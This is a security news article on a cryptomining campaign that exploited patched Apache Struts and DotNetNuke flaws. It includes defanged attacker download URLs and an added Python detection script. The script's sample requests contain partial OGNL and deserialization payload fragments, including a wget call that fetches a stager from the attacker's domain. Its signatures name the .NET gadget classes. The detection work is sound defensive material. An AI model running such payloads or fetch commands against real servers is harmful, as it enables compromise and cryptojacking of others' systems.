Attackers are exploiting two older, already patched vulnerabilities to compromise servers and install software that mines the Monero digital currency.
Trend Micro researcher Hubert Lin reported a significant increase in exploitation attempts against Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) starting in December. So far the malicious actor behind the attacks is estimated to have netted about $12,000, or 30 XMR.
“We believe that this is the work of a single threat actor, as the sites all point to a single malicious domain to download Monero miners, which also all point to a single Monero address,” Lin wrote.
An attack starts with a crafted HTTP request sent to the target server. If the server is unpatched, the Struts flaw (an OGNL injection through the Content-Type header) or the DotNetNuke flaw (unsafe deserialization of the DNNPersonalization cookie) is exploited to execute code on the server, and that code eventually downloads a Monero miner.
The attacks hit both Windows and Linux systems, and Lin noted that the URL used to download the miner depends on the operating system. The same URLs are used whether the entry point was Struts or DotNetNuke:
Windows – hxxp://eeme7j[.]win/scv[.]ps1 leading to the download of a miner from hxxp://eeme7j[.]win/mule[.]exe (detected as TROJ_BITMIN.JU)
Linux – hxxp://eeme7j[.]win/larva[.]sh leading to the download of a miner from hxxp://eeme7j[.]win/mule (detected as ELF_BITMIN.AK)
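To turn the chain described above into a check a defender can run against web-server traffic, here is an added Python example; it is not code from Trend Micro's report or from this article. It scans constructed HTTP request records for three things: an expression opener in a Content-Type header (the shape of CVE-2017-5638 exploitation), a DNNPersonalization cookie declaring a known .NET gadget type (the shape of CVE-2017-9822 exploitation), and any reference to the download host named in the report. The two request signatures are detection heuristics chosen here, not patterns taken from the report, and the sample requests are constructed with their payload bodies elided.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Download host named in the report, kept defanged in source. Traffic is
# normalised to the live spelling before matching so either form is caught.
MINER_DOMAIN_DEFANGED = "eeme7j[.]win"


def refang(s: str) -> str:
    """Turn 'hxxp://host[.]tld' style text into its live form for matching."""
    return s.replace("[.]", ".").replace("hxxp://", "http://")


MINER_DOMAIN = refang(MINER_DOMAIN_DEFANGED)

# Heuristic for CVE-2017-5638 (chosen here, not from the report): the bug is an
# OGNL injection via the Content-Type header, so an expression opener in that
# header is never legitimate.
STRUTS_OGNL = re.compile(r"[%$]\{")

# Heuristic for CVE-2017-9822 (chosen here): the bug is deserialisation of the
# DNNPersonalization cookie. Public payloads name a .NET gadget class in the
# item's type attribute; an ordinary profile item does not.
DNN_COOKIE = re.compile(r"(?:^|;\s*)DNNPersonalization=")
DNN_GADGET_TYPE = re.compile(r'type="[^"]*(ObjectDataProvider|ExpandedWrapper)', re.I)


@dataclass
class Request:
    src_ip: str
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)


def classify(req: Request) -> List[str]:
    """Return a tag for every indicator the request matches (empty if clean)."""
    tags: List[str] = []
    if STRUTS_OGNL.search(req.headers.get("Content-Type", "")):
        tags.append("struts-ognl")
    cookie = req.headers.get("Cookie", "")
    if DNN_COOKIE.search(cookie) and DNN_GADGET_TYPE.search(cookie):
        tags.append("dnn-deserialization")
    # The stager URL rides inside the exploit payload, so search every field.
    haystack = refang(" ".join([req.path, *req.headers.values()]))
    if MINER_DOMAIN in haystack:
        tags.append("miner-domain")
    return tags


def scan(requests: List[Request]) -> Dict[str, List[str]]:
    """Map each source IP to the distinct indicators it triggered."""
    hits: Dict[str, List[str]] = {}
    for req in requests:
        for tag in classify(req):
            if tag not in hits.setdefault(req.src_ip, []):
                hits[req.src_ip].append(tag)
    return hits


# Constructed sample traffic (not captured data); payload bodies elided with "...".
SAMPLE_REQUESTS = [
    Request("198.51.100.7", "POST", "/struts2-showcase/index.action", {
        "Content-Type": "%{(#_='multipart/form-data').(#cmd='wget hxxp://eeme7j[.]win/larva[.]sh')...}",
    }),
    Request("203.0.113.9", "GET", "/Default.aspx", {
        "Cookie": 'DNNPersonalization=<profile><item key="x" type="System.Data.Services.Internal.ExpandedWrapper`1[[System.Windows.Data.ObjectDataProvider...]]">...</item></profile>',
    }),
    # Benign: a normal multipart upload and an ordinary profile cookie.
    Request("192.0.2.21", "POST", "/upload.action", {
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4",
        "Cookie": 'DNNPersonalization=<profile><item key="Usability:UserMode" type="System.String">VIEW</item></profile>',
    }),
]

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_REQUESTS).items():
        print(ip, tags)
```

The benign third record matters as much as the two hits: a legitimate DNNPersonalization cookie also carries a `type` attribute, so matching on the cookie name alone would flood the alert queue, and the check keys on the gadget class instead. The domain match is a weak indicator on its own (the actor can change hosts at will) but is cheap to run against outbound proxy logs as well as inbound requests.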
The number of attacks has declined recently, but Lin noted that they have not stopped, in part because system administrators still have not recognized the danger posed by these Apache Struts and DotNetNuke flaws and patched their systems. Patches for both issues have been available since March and August 2017, respectively.